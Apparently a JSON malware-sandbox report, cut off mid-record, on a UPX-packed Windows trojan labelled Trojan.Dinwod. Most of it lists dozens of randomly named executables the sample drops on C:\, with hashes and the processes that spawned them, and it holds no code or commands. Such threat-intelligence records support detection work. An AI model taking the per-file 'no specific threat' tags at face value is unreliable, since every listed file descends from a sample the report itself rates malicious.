{"size": 343081, "type": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "submit_name": "edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0", "sha256": "edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0", "av_detect": 95, "vx_family": "Trojan.Dinwod", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "The operation completed successfully. (0x0)", "total_processes": 64, "total_signatures": 110, "extracted_files": [{"name": "0064284.exe", "file_path": "C:\\0064284.exe", "file_size": 343406, "sha256": "4686f5df527627b790d723e9c7bdc45fa2e3b692dabc95be540bde4217113ac5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "0064284.exe (PID: 1856)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "00644.exe", "file_path": "C:\\00644.exe", "file_size": 343547, "sha256": "9604d9321e35f1f97e2a4e5e5a8ef611c73a503994410dadac9c47c0f8d235d0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "00644.exe (PID: 3996)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "0080208.exe", "file_path": "C:\\0080208.exe", "file_size": 343442, "sha256": "aff57f12cb85e8b1772aa15bc14f54f5da113bdacee1df46caf8cbb0e0776436", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "62266.exe (PID: 5392)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "020286.exe", "file_path": "C:\\020286.exe", "file_size": 343918, "sha256": "ea38be77c5644e1e77989921d270370d5e0354b2954440814defbb4f4156cc83", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "020286.exe (PID: 4040)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "02488.exe", "file_path": "C:\\02488.exe", "file_size": 343950, "sha256": "45510ba6fb73df2e9adf1a0cf1361feebfdae27fee48831d1f864c28410baaa6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "24026.exe (PID: 2876)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "042464.exe", "file_path": "C:\\042464.exe", "file_size": 343605, "sha256": "9a6ffccb0c1b3d2865c10a1946d65fe6ecdb9be492ecf91b72892d7eade08bfa", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "604420.exe (PID: 888)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "06224.exe", "file_path": "C:\\06224.exe", "file_size": 343131, "sha256": "25a06ed5bc2596bcd131d2eccba1813ea5483ff43b03f8105d6cb4fa6d2c319d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "26802.exe (PID: 4268)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "06484.exe", "file_path": "C:\\06484.exe", "file_size": 343111, "sha256": "e70d283df54e428fd29ab49669a843ece5c7648185d4e1b39697bf9a447d9f03", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "242680.exe (PID: 5352)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "0806624.exe", "file_path": "C:\\0806624.exe", "file_size": 343621, "sha256": "3425110968d475c19b080370c9269614ac4476602d7349d05dfefdc66b4181b0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "0806624.exe (PID: 1604)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "0824600.exe", "file_path": "C:\\0824600.exe", "file_size": 343716, "sha256": "d2356a94f0c588ca2093ffe39eed38c906b18346a3505d31e60f76e8f298e858", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "0824600.exe (PID: 3028)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "24026.exe", "file_path": "C:\\24026.exe", "file_size": 343937, "sha256": "728fc58b4a06207d1f7d2d7748b60f1afe274655f7a7f4fd3e2000b70f93b61d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "020286.exe (PID: 4040)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "24226.exe", "file_path": "C:\\24226.exe", "file_size": 343563, "sha256": "2f00706246ee90b5eaa13e237a384b36024a86e16820bfe7a4c284e7cbccfe2f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "24226.exe (PID: 3624)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "242680.exe", "file_path": "C:\\242680.exe", "file_size": 343092, "sha256": "088c8e57a20366a64b93bd847b9ede93da85d5c04c75c9eefd716ab866c56257", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "242680.exe (PID: 5352)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "26802.exe", "file_path": "C:\\26802.exe", "file_size": 343121, "sha256": "79b03795a8b45c10e3adc0e38b9b9e4d2d51db00c4468fe18f451f603c346191", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "26802.exe (PID: 4268)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "284486.exe", "file_path": "C:\\284486.exe", "file_size": 343755, "sha256": "89dab8c664ffa8b00b2ad9b34f858b24e9f372dba95e7bda96eb467b0d9b628b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "8280068.exe (PID: 3416)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "408628.exe", "file_path": "C:\\408628.exe", "file_size": 343767, "sha256": "41155999ad2434ef2e836db9ee116a213521c03d8d63b2270ad9a1b358fecdcb", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "408628.exe (PID: 2764)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "408822.exe", "file_path": "C:\\408822.exe", "file_size": 343535, "sha256": "473f369e7fcb0e292abd4a4941245964659aa760012809b47dc14818f47d023d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vldfrx.exe (PID: 3448)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4088420.exe", "file_path": "C:\\4088420.exe", "file_size": 343779, "sha256": "e134fe428ac56b7dfeec6c1fa728019fd7b4d83f140eb2a3acc121b0a9acaab1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "408628.exe (PID: 2764)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4288806.exe", "file_path": "C:\\4288806.exe", "file_size": 343574, "sha256": "eec25f269a893406d2b6aa4d1bcbdf0a51e3fde9862a6b63c0e4b6d755df81c3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4288806.exe (PID: 1656)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4640626.exe", "file_path": "C:\\4640626.exe", "file_size": 343657, "sha256": "935bbed2ae637e263c425a34a93e7d111cda916d987ecc3dd615848b77e0da16", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "8024466.exe (PID: 708)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "484088.exe", "file_path": "C:\\484088.exe", "file_size": 343416, "sha256": "cf558aff0921115fc6638374cab5a5dee084695c0dbd2a6858dbb4542941d56d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "0064284.exe (PID: 1856)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "604420.exe", "file_path": "C:\\604420.exe", "file_size": 343594, "sha256": "f6992de6debdb0ff9d9e3d915fa46ba8a2d5694e1a136216c60cf37616b1f567", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4288806.exe (PID: 1656)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "62266.exe", "file_path": "C:\\62266.exe", "file_size": 343430, "sha256": "aa41d8822cc0a59a33c4b681e5b3010f5175e0aee6fd22ab7d8fbcdecb4d57c3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "62266.exe (PID: 5392)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "626400.exe", "file_path": "C:\\626400.exe", "file_size": 343253, "sha256": "99575cee6ccf9f2f5fa06a813f8347be09adab3933b2c3a0836d447f8ee89163", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "626400.exe (PID: 5072)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6466820.exe", "file_path": "C:\\6466820.exe", "file_size": 343790, "sha256": "f8930fd9fca279d641abaffa9a2c6512bf971b5e0c1e6465171be98310a7c2c4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "6466820.exe (PID: 704)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "648268.exe", "file_path": "C:\\648268.exe", "file_size": 343452, "sha256": "90355dfa4feefe0a50745726124eeb16eb744d358608f292da5af018e17daade", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "0080208.exe (PID: 656)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8024466.exe", "file_path": "C:\\8024466.exe", "file_size": 343640, "sha256": "f77983cc04fdf1d10838f42d03124bf5e0e4e14835bd48a21f0e33978c9ea872", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "0806624.exe (PID: 1604)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8280068.exe", "file_path": "C:\\8280068.exe", "file_size": 343736, "sha256": "05712da950e76e72d2117c57bbe98ee3ccbeec59acccdae4747a1afc06683ddc", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "8280068.exe (PID: 3416)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "880202.exe", "file_path": "C:\\880202.exe", "file_size": 343281, "sha256": "d44be713b75220aa3853dcbfd8b195604b7b2442b43b9eba1bf4543ff165bbd9", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "880202.exe (PID: 3228)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "882066.exe", "file_path": "C:\\882066.exe", "file_size": 343266, "sha256": "4828ec708403b5a066f0222a8dc6db4691813100eb280761229120e42051b874", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "626400.exe (PID: 5072)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8844064.exe", "file_path": "C:\\8844064.exe", "file_size": 343210, "sha256": "88bb742d395fc12854aba766c5e13e1b192e2c9c27766e84e055d23c0400a4eb", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "8844064.exe (PID: 6120)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bdvpj.exe", "file_path": "C:\\bdvpj.exe", "file_size": 343477, "sha256": "ff61dc582fbb4ba20152e172e8f2c4fbee24ef4478db2ec2af711166061879e5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "thntdfd.exe (PID: 2152)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bhbtd.exe", "file_path": "C:\\bhbtd.exe", "file_size": 343865, "sha256": "32921a507feb18db82209ecf7baf19d008762bc54753a5bf65ba5387e77f152f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vtbthnv.exe (PID: 3972)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bnjjv.exe", "file_path": "C:\\bnjjv.exe", "file_size": 343241, "sha256": "081822a667dbe74b40b25b24e883348a37feff5a5c2a80c378bd4bb91cf9a332", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "pxjrr.exe (PID: 6092)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bnvxpv.exe", "file_path": "C:\\bnvxpv.exe", "file_size": 343834, "sha256": "14512ed4594c3d267d4a7339bb6a19c4b94f78c5d95eabe8b0c7d1b6d1da5b81", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rnhbh.exe (PID: 3844)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dppbn.exe", "file_path": "C:\\dppbn.exe", "file_size": 343327, "sha256": "1d216e4c92642f321c7049bab8089985d9cf165e7ad71f6b9b2a11e6f75c8ae6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dppbn.exe (PID: 3260)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dxrftlp.exe", "file_path": "C:\\dxrftlp.exe", "file_size": 343339, "sha256": "5a792818a85c1ccbb33bebf947e386fdca3b662557aaa15d4ad00e45e43021d1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dppbn.exe (PID: 3260)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fbtltj.exe", "file_path": "C:\\fbtltj.exe", "file_size": 343395, "sha256": "ceb44bcbdeaa2b73ff8f98e675124cfa622263be0737f9c31a8606221e6dba6a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rxvhlp.exe (PID: 3500)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fdjlrbp.exe", "file_path": "C:\\fdjlrbp.exe", "file_size": 343699, "sha256": "06fde6f13432f8cfc5bc83aa356883caa42d495a9f4d9ce2923eb38d8eebd6c0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fdjlrbp.exe (PID: 4568)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fnttpf.exe", "file_path": "C:\\fnttpf.exe", "file_size": 343898, "sha256": "d3cf8a12f9678c2a0fd3fa5dfd93127c189ee1ee25ba1180cdc54e3135f42971", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fnttpf.exe (PID: 3776)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ftvfbtx.exe", "file_path": "C:\\ftvfbtx.exe", "file_size": 343364, "sha256": "58a483ccd3585534044c3487fd250742c8b7384841f3b2529dc94208d907e4a8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "ftvfbtx.exe (PID: 1852)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hbrjl.exe", "file_path": "C:\\hbrjl.exe", "file_size": 343845, "sha256": "728fa072a74ddeb2a3a9cc07caffabb73fc83d297b3a351a93ed8a83559de2f0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "hbrjl.exe (PID: 3064)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hfrvlvv.exe", "file_path": "C:\\hfrvlvv.exe", "file_size": 343975, "sha256": "f0db3cfccdf2ba9032ab9888a52431edf2b6765fee1112f1b2bc0e460a0952f1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tfjtht.exe (PID: 1292)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hnbnnnb.exe", "file_path": "C:\\hnbnnnb.exe", "file_size": 343317, "sha256": "60f101070ead7556ef7e936c1f53769398931230aa1a94ab249ee4b757cf98ea", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nvrtbh.exe (PID: 3680)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hrhfdtt.exe", "file_path": "C:\\hrhfdtt.exe", "file_size": 343684, "sha256": "34c8f871812803e95c665fd10b51a640c6536f6bc94c2882a6aa0ff68eb0cf47", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "hrhfdtt.exe (PID: 3748)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jbvvj.exe", "file_path": "C:\\jbvvj.exe", "file_size": 343502, "sha256": "0b670e0eca95d7afe2691c3427d57d75d37eb434af7b505d608530ce6f63275a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "xxlthnt.exe (PID: 608)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jrfxlf.exe", "file_path": "C:\\jrfxlf.exe", "file_size": 343197, "sha256": "da1c2b861b3ac7d460b191a29714c8b70b7e8f6385fb96f81362abf37f0199be", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jrfxlf.exe (PID: 4648)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lpftbf.exe", "file_path": "C:\\lpftbf.exe", "file_size": 343881, "sha256": "b262c45578eb700a55dc9f3c941dc0e9b65c293c8737b1b3e71bc2c9045e5114", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "lpftbf.exe (PID: 2812)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "njljtn.exe", "file_path": "C:\\njljtn.exe", "file_size": 343153, "sha256": "38567e3f355181f9ae70ea5a709cb0733b0ddf596238cf5978771c2d61d87db5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "njljtn.exe (PID: 2220)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ntnbrnr.exe", "file_path": "C:\\ntnbrnr.exe", "file_size": 343801, "sha256": "647af5bacac418e1e36b9344ff72468344c6042114753498e7a4fb08fd260af5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "ntnbrnr.exe (PID: 2172)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nvrtbh.exe", "file_path": "C:\\nvrtbh.exe", "file_size": 343298, "sha256": "f35dbd395ea2170b771a0e205468e50939cd7393040ae75a70ec933f1ff49e98", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "880202.exe (PID: 3228)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "plfthj.exe", "file_path": "C:\\plfthj.exe", "file_size": 343183, "sha256": "d073c639a524785c8f26073cd3266a8f15e8036467320b605eee71e09586981a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "xvdbp.exe (PID: 2116)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pxjrr.exe", "file_path": "C:\\pxjrr.exe", "file_size": 343224, "sha256": "a75480c52490e262a235f46d094f947cc2dd31f8f266198f01df55256a87b97c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "8844064.exe (PID: 6120)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rnhbh.exe", "file_path": "C:\\rnhbh.exe", "file_size": 343818, "sha256": "cb8cfdfd5a61ca13c75d6ef62ec508f0245a59bd4e93fe4d1aaa8fd52aa397dc", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rnhbh.exe (PID: 3844)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rxvhlp.exe", "file_path": "C:\\rxvhlp.exe", "file_size": 343380, "sha256": "9548a81272f47e78d457ed0f76986dd8027c26a1cddff3df8572fa023058e2ee", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "ftvfbtx.exe (PID: 1852)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tfjtht.exe", "file_path": "C:\\tfjtht.exe", "file_size": 343964, "sha256": "ccf9cc99f6bbd10370cc4bcc9eb7f5431d56b4c46c2a521b7c4255c4089f6e4a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tfjtht.exe (PID: 1292)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "thntdfd.exe", "file_path": "C:\\thntdfd.exe", "file_size": 343465, "sha256": "c3da08373581df9ac8d71fb8c6417b92a78c3ceb7dfc2785b7cb228499c1a86c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "thntdfd.exe (PID: 2152)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vldfrx.exe", "file_path": "C:\\vldfrx.exe", "file_size": 343522, "sha256": "82b4d96d8713162ff6ebb350a60410d500c915d2611213fb761c9f4da56302e2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vldfrx.exe (PID: 3448)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vtbthnv.exe", "file_path": "C:\\vtbthnv.exe", "file_size": 343855, "sha256": "99640b4431bc88da75c316262ee9aab68f0a7cce12519100df29e4923c8ddd60", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vtbthnv.exe (PID: 3972)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xrfpvx.exe", "file_path": "C:\\xrfpvx.exe", "file_size": 343673, "sha256": "dae240dc31af77c1ff87e6d85a194827519d1119d2cfe7c258a132467c93a983", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "xrfpvx.exe (PID: 1844)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xrnbdjd.exe", "file_path": "C:\\xrnbdjd.exe", "file_size": 343142, "sha256": "855751bdde347dbb3a72b4fc2babe07dbc65d4b89e3fcadd030825770e2dcca0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "xrnbdjd.exe (PID: 5188)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xvdbp.exe", "file_path": "C:\\xvdbp.exe", "file_size": 343168, "sha256": "52426c29dcb823fe3280c0b8f98cd818cbdf70b21acd073fb3e71bf8c3fcd5f4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "xvdbp.exe (PID: 2116)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xvnnn.exe", "file_path": "C:\\xvnnn.exe", "file_size": 343349, "sha256": "26ae4350ce98fb84f0a7752a531b15221bd6855b85fa2f88132044c428b3195e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dxrftlp.exe (PID: 2444)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xxlthnt.exe", "file_path": "C:\\xxlthnt.exe", "file_size": 343490, "sha256": "36092a4e6ade00c1adccfcdf5158e5b3bebab6ad70a5fdf0b3e1682df2f601e5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "xxlthnt.exe (PID: 608)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fvxfr.exe", "file_size": 344148, "sha256": "2ec4f73383f3d2736bbb450fb2aa04294ca50b40c6857b11ef42746e3a9120ca", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fpnhxpp.exe", "file_size": 344137, "sha256": "596e7f59a07549b0d3497146c9affffc411bc2a73a2cd5b5b08e2c6c32c422cc", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dlnbh.exe", "file_size": 344118, "sha256": "3bc5a4ccccbfb69a8faf36ca879bedbf867a452cde52ae8c2d8714cfdad13824", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jfjjpnn.exe", "file_size": 344106, "sha256": "4d9e0d21559f1e4d17b93da08554bb10a75671159014b3d06a127bdb3cc2bfe0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bttxlfh.exe", "file_size": 344088, "sha256": "ff4b1bfa8d046117601f589b4bc499984c48f72166e278bfade20d8f2e6c7a59", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hlphd.exe", "file_size": 344070, "sha256": "1340ac801417a45a776afc144a7def14a5a2f7bd19932b02a4841385c478b43e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8664860.exe", "file_size": 344060, "sha256": "72a7f1efe54b9d33c887f2d478d9d202cc85aeba28e1f1aadbc505789ccd4f0e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "868480.exe", "file_size": 344045, "sha256": "39ad615912213fe52f5771a5d42cf74ae2375f2853a94ce5323b54d12002dd64", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "44822.exe", "file_size": 344035, "sha256": "e451f48be8134310d5c026e49985f95923bbf72a6cbbe7bb218b25642c5c74c6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "06066.exe", "file_size": 344024, "sha256": "fbbc9dfa9a575f16588703d51402b31a0f307f550da77abbb5c67d35a7730a37", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lxvrdvn.exe", "file_size": 344009, "sha256": 